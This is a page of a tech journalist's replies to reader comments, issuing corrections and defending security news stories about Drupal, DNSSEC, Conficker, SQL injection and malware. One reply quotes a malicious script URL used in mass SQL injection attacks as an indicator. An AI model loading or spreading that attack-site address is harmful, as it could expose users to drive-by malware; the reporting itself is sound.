Posts by Dan Goodin

Correction -- Opera doesn't support TLS 1.2 by default

Dear readers,

Contrary to what was published earlier, Opera doesn't support TLS 1.2 by default. Our apologies for the error.

@Anonymous Coward

For the record, "gaping" was used to suggest how easy it was for this bug to be spotted during a routine audit. A bug need not be easily exploitable for it to be extremely obvious.

Given the ability for Drupal XSS's to silently reset the super user password, I think it's fair to say this bug should have been caught long ago. It wasn't, even after the White House developers gave themselves a big pat on the back for releasing their own code that built off the same buggy module.

That's why the vuln is news and why The Reg stands by this story.

Carry on.

@@...malware? ...really?

x25,

This is an article reporting the contents of a lawsuit that was filed by Google. It contains numerous allegations Google has made about Pacific WebWorks. How is it "simply incredible" that I'd include that detail?

More importantly, what evidence do you have that this detail is incorrect?

@s it or isn't it?

Anonymous coward, the bug is present in Windows 2007 RC. It's not present in Windows 2007 RTM.

Make sense?

@Who is Stuart McConnachie?

AC, my bad for not inferring your comment correctly. I assure you McConnachie wasn't trying to take credit for the work of others.

As for your question about the statement, the copy that I've seen lists the fee to the very penny, as in $23,148,855,308,184,500.00.

@James O'Brien

Hey James,

Not sure if your question is just bait. Assuming it isn't, here's the answer:

In journalism, as in many other aspects of life, there are real-time deadlines. So what to do when it's time to hit to publish button and you still haven't gotten an answer to your question? Do you:

a) lay out the fact that you indeed asked the company for their side of the story and didn't get a response by press time (i.e. an "immediate response")? or

b) not mention it at all and let readers wonder if you bothered to email the company at all?

No, companies aren't at journalists' beck and call. But they have a right to have their voice heard in stories that directly concern them. I was only trying to make sure it was clear I tried to give them that opportunity and for whatever reason had not gotten a response by press time.

The reason we say didn't "immediately respond" is to make it clear that there wasn't a whole lot of time between the time we asked and the time the story was published. In the case of this story, it was about 2 and a half hours.

Make sense?

@Jay Daley

Here's the text of the NTIA's press release:

Commerce Department to Work with ICANN and VeriSign to Enhance the Security and Stability of the Internet’s Domain Name and Addressing System

For Immediate Release: June 3, 2009

NTIA Contact: Bart Forbes, [phone number and email address removed]

NIST Contact: Chad Boutin, [phone number and email address removed]

WASHINGTON — The U.S. Department of Commerce's National Telecommunications and Information Administration (NTIA) and National Institute of Standards and Technology (NIST) announced today that the two agencies are working with the Internet Corporation for Assigned Names and Numbers (ICANN) and VeriSign on an initiative to enhance the security and stability of the Internet. The parties are working on an interim approach to deployment, by year’s end, of a security technology -- Domain Name System Security Extensions (DNSSEC) -- at the authoritative root zone (i.e., the address book) of the Internet. There will be further consultations with the Internet technical community as the testing and implementation plans are developed.

The Domain Name and Addressing System (DNS) is a critical component of the Internet infrastructure. The DNS associates user-friendly domain names (e.g., www.commerce.gov) with the numeric network addresses (e.g., 170.110.225.163) required to deliver information on the Internet, making the Internet easier for the public to navigate. The accuracy, integrity, and availability of the data supplied by the DNS are essential to the operation of any system or service that uses the Internet. Over the years, vulnerabilities have been identified in the DNS protocol that threaten the authenticity and integrity of the DNS data. Many of these vulnerabilities are mitigated by DNSSEC, which is a suite of Internet Engineering Task Force (IETF) specifications for securing information provided by the DNS.

“The Internet is an ever-increasing means of communications and commerce, and this success is due in part to the Internet domain name and addressing system,” said Acting NTIA Administrator Anna M. Gomez. “The Administration is committed to preserving the stability and security of the DNS, and today’s announcement supports this commitment.”

"NIST has been an active participant within the international community in developing the DNSSEC protocols and has collaborated with various U.S. agencies in deploying DNSSEC within the .gov domain," said Cita M. Furlani, director of NIST's Information Technology Laboratory. "Signing the root will significantly speed up the global deployment of DNSSEC and enhance the security of the Internet.”

The NTIA in the U.S. Department of Commerce serves as the executive branch agency principally responsible for advising the President on communications and information policies. For more information about the NTIA, visit www.ntia.doc.gov.

As a non-regulatory agency, NIST promotes U.S. innovation and industrial competitiveness by advancing measurement science, standards and technology in ways that enhance economic security and improve our quality of life. For more information visit, www.nist.gov.

# # #

@Ian Braithwaite

You're right. It's a single customer allocation that's enough to support 4 billion versions of today's internet. Story corrected.

@cybersub

That was a typo on my part, which has now been fixed. My apologies.

@Can someone point us to the NMAP signatures?

Folks,

Nmap creator Gordon Lyon, aka Fyodor, just emailed me to say he expects the Conficker update to be available within the next hour or so. For those who can't wait and don't mind mucking about with manual commands, the code is available at:

http://www.skullsecurity.org/blog/?p=209

Fyodor plans to announce availability of the patch at:

http://seclists.org/nmap-dev/2009/q1/index.html

Cheers,

Dan Goodin

In defense of Charlie Miller

To those criticizing Charlie Miller for sitting on a Safari bug for more than 12 months, please consider the following:

A bug isn't the same thing as an exploit. While Miller discovered the bug more than a year ago, it was only recently that he figured out a way to exploit it so he could remotely execute code. Charlie told me he spent considerable time an effort making this happen. Meanwhile, he has paying clients and hard deadlines to meet. Under the circumstances, I don't think there's anything wrong with him dusting off an old bug when entering this contest.

I Stand corrected

Thanks to Jack and AC for setting me straight. Story has been corrected.

@Java?

AC, unfortunately, the advisory is less than crystal clear on this.

It says: "To exploit this issue an attacker needs to execute active content (Java, Flash, Silverlight, etc) in the context of a web browser." Elsewhere it says, "Browser plugins (Flash, Java, etc) may enforce access controls on active content by limiting communication to the site or domain that the content originated from."

Not sure if the author really meant javascript. If anyone from CERT knows, please contact me.

@Alex King @Patrick Clark

"Maybe it's the shocking spelling in the article title. I too was expecting an insightful article about foot fetishism."

Cute, but reality is that for 305 million Americans, "pedophile" is the preferred spelling. Geez, and people accuse us yanks of living in a cocoon.

http://dictionary.reference.com/browse/pedophile

@"where sabotage by disgruntled employees is common"

Brent Weaver and others,

No doubt, the overwhelming majority of IT admins are honest, hard-working and law-abiding. But the fact remains that The Reg reports these types of stories with a fair amount of regularity. A small smattering includes:

http://www.theregister.co.uk/2008/09/05/88percent_it_admins_would_steal_sensitive_data/

http://www.theregister.co.uk/2009/01/07/it_admin_sentenced/

http://www.theregister.co.uk/2009/01/26/rogue_contractor_nt_gov_hacking/

http://www.theregister.co.uk/2008/06/26/fired_it_manager_rampage/

http://www.channelregister.co.uk/2007/12/04/admin_steals_consumer_records/

http://www.theregister.co.uk/2008/12/29/terry_childs_trial/

http://www.theregister.co.uk/2008/01/24/disgruntled_employee_silent_rampage/

http://www.theregister.co.uk/2007/04/20/terrorists_among_us_flee_flee/

@gratutitous FUD

Anonymous coward, no conspiracy or FUD mangling going on here. Just disclosing that Maone is the creator of a product that competes with these Internet Explorer security measures and pointing out that security researchers with no dog in the fight agree with Maone.

@Details = good

EJ,

Thanks for the kind words. I've updated the article to include the following paragraph:

Attack strings in separate SQL injections include 17gamo.com/1.js. Researchers say the number of attack sites is too high to keep exhaustive lists, but Shadowserver is doing an admirable job here (http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210)

Someone else asked what platforms the hacked sites were running on. That information wasn't available, but in general SQL injections attack web applications that fail to sanitize user input rather than the underlying database. Many of the SQL injections in the past worked on a variety of database programs. (See http://www.theregister.co.uk/2008/05/14/asprox_attacks_websites/ and http://www.theregister.co.uk/2008/04/25/mass_web_attack_grows/)

Cheers,

Dang

@Andrew Ness

If you read the article, you clearly didn't comprehend it. Yes, The Reg uses Google Analytics, just like so many other web sites. But I assure you we don't link it to the admin section of our website for the reasons laid out above.

This point has been repeated umpteen times. Please finally take it in: It would be trivial for anyone with control to urchin.js to add scripts that steal session cookies, siphon the username and password entered and send them to any server of the attacker's choosing. With either of these two pieces of data, Change.gov has now been compromised. This is a risk that The Reg isn't willing to take, and it should be a risk that Change.gov isn't willing to take either.

Comprende?

story updated to correct link

ta

@Discrepancy

Luke,

You're right, it was Secretary Brown who said that, not the governor. Thanks for pointing out. Error corrected.

This configuration of OpenVPN should *not* be blocked by most hotspots

To those complaining that OpenVPN is frequently blocked by hotspots, note that the configuration offered here uses port 443, which is open on the typical Wi-Fi network. This is exactly the configuration that JohnG discusses a few comments back.

@James Penketh

Sorry, that was a typo. Story has been corrected to show the command is "cd".

Presentation slides

AC, I've replaced the link to TG Daily with a link to an MIT site. As of Sunday, it was still hosting the slides.

@Keir Snelling

"At a guess, I'd say MS Remote Desktop. The client has a default setting that maps local printers to the terminal server. The client will advertise all of its local printers to the terminal server, and if the server has a matching driver, the printer will map. This is all recorder in the event log."

Remote Desktop is exactly correct. Should have included that detail in the story.

@Anonymous Coward

Do you even think before spewing out such drivel? This won't be the first time Gregory King has spent time before bars. Tami alluded to this, but you're too busy offering knee-jerk reactions to take this in. I suppose if someone inflicted tens of thousands of dollars in damage on your business you'd sit the chap down by a campfire and sing Kumbaya.

And since when is Greg King a "kid"? He's 21 years old. Do try to get your facts straight before posting, will you?

@What is free speech

Stranger: You're right: Megan Meier was 13, not 16. The error has been corrected. Thanks for bringing it to our attention.

@BillPhollins RE: PCI Compliace

AC, I think you're confusing the TJX breach with a different breach. TJX secured its network with WEP, allowing the intruders easy assess. TJX also held on to data well after it should have dumped it.

See:

http://www.theregister.co.uk/2007/10/24/tjx_breach_estimate_grows/

http://www.theregister.co.uk/2007/05/04/txj_nonfeasance/

Geez David Wiernicki

Where do you think CNN.com got the story? From the same AP reporter credited. Do feel free to think before commenting in the future.

Contact them???

James Smith, et al.

Ever notice how slow ISPs are to deal with anything? Now multiply the delay by 25,000. I'm pretty sure TippingPoint has better things to do. As for popups and other types of notification: anytime you're running code on an infected machine, you're likely to get unintended consequences. Bottom line, contacting the infected users isn't practical. Anyone who believes otherwise should go ahead and contact each user himself (a list of the infected IP addresses is at http://dvlabs.tippingpoint.com/pub/pamini/kraken_uniq_ips.txt)

M. Burns, if you'd bother to look, you'd notice TippingPoint documented infected IPs and gave a deep dive analysis into their infiltration. What kind of proof do you want?

@Simon Whitehouse

Ever heard of key signing parties? Even with asymmetrical schemes, there is a need to securely exchange public keys. If a bad guy fools me into using the wrong public key to encrypt a message, the entire system fails.

So yes, an organization of 1,000 people still need to figure out a way to securely distributed their public key to each of their colleagues, and if you do the math, that's very close to 1 million exchanges.

@Minor nit

R Callan,

Here in San Francisco, that's how meter is spelled . . . or is it spelt?

Story corrected

Hey Anonymous Coward,

Due to incorrect information supplied to The Register, we got the name of the university wrong in an earlier version of the story. The article has been updated. Thanks for pointing out the mistake.

@Whew, thought it was a serious threat

Jimmy,

Kindly read the article. Many if not all of the servers are running Apache.

Incorrect?

Many thanks to all the readers who are weighing in. I've just updated the story to respond to comments that there are inaccuracies.

Sorry about the confusion

Based on the number of comments saying the article is confusing, it's obvious we could have done a better job explaining things. Essentially, XXX is correct when writing:

"This article is about a CLIENT vulnerability!

"The malware is changing the DNS setting at the CLIENT (Windows) to make the CLIENT query the WRONG DNS server. You can secure your DNS server to the point of unplugging it and locking it in a bank vault 5 miles underground and it won't fix this problem. All of the servers are functioning as intended and designed (including the "bad" ones).

"Sure, there are DNS server vulnerabilities (some highlighted above) but THIS IS NOT ONE OF THEM.

"The malware ... typically involved a single line of code"

"Only Microsoft can fix this, not the sysadmins for 17,000,000 DNS servers."

The client vulnerability generally works by changing a single registry setting, rather than altering a victim's hosts file. During any given week while the study was being conducted, the researchers found hundreds of URLs pointing to exploits.

The questions about recursion and authoritative, vs forwarding DNS servers are beyond my ken, I'm afraid, so I won't touch them.

Bloch is a Republican

"Bloch is a DEMOCRAT investigating the Bush White House! The wipe happened maybe because HE is being investigated?"

Actually, Bloch is a Bush-appointed Republican.

No harm in viewing Google searches

AC2: Calm down. There is no harm in clicking on the links in the Reg story. They simply take you to a Google page and run a search that shows links to the infected pages. Heck, even clicking on the search results themselves doesn't install malware so long as you don't click yes to popups that ask if they can install software on your machine.

Just to make things extra clear, I've updated the story to say "safe to click if you don't mind "porn" in your url, but you probably shouldn't click on any of search results."

@guess it does not effect everyon

"I'm using Leopard 10.5.1. I ran the heise email check and tried to open the attachment, quickview showed nothing, so I clicked on the email attachment and got the standard security warning:-

“Heise.jpg” may be an application. It was attached to a mail message and will be opened by Terminal. Are you sure you want to open it?"

Wonder what version of Leopard he was using? A pre-final?"

Hey Derek,

Thanks very much for writing. As noted in the article, The warning fails to run "about 90 percent of the time," with little understanding as to what causes it to display in some cases and not in others.

I've yet to install Leopard on my MacBook Pro, so I can't test Schmidt's demo. I'd be eager to hear the results other Leopard users get.

Updated

Story updated to reflect comment from Monster.com representatives.

@Mac or Windows or both?

Anonymous Coward,

Good question. According to Mozilla, Linux, Mac and Windows versions of Firefox are vulnerable. We've updated our story to reflect this.

you're right

Indeed, it is advance notice. Thanks for spotting that.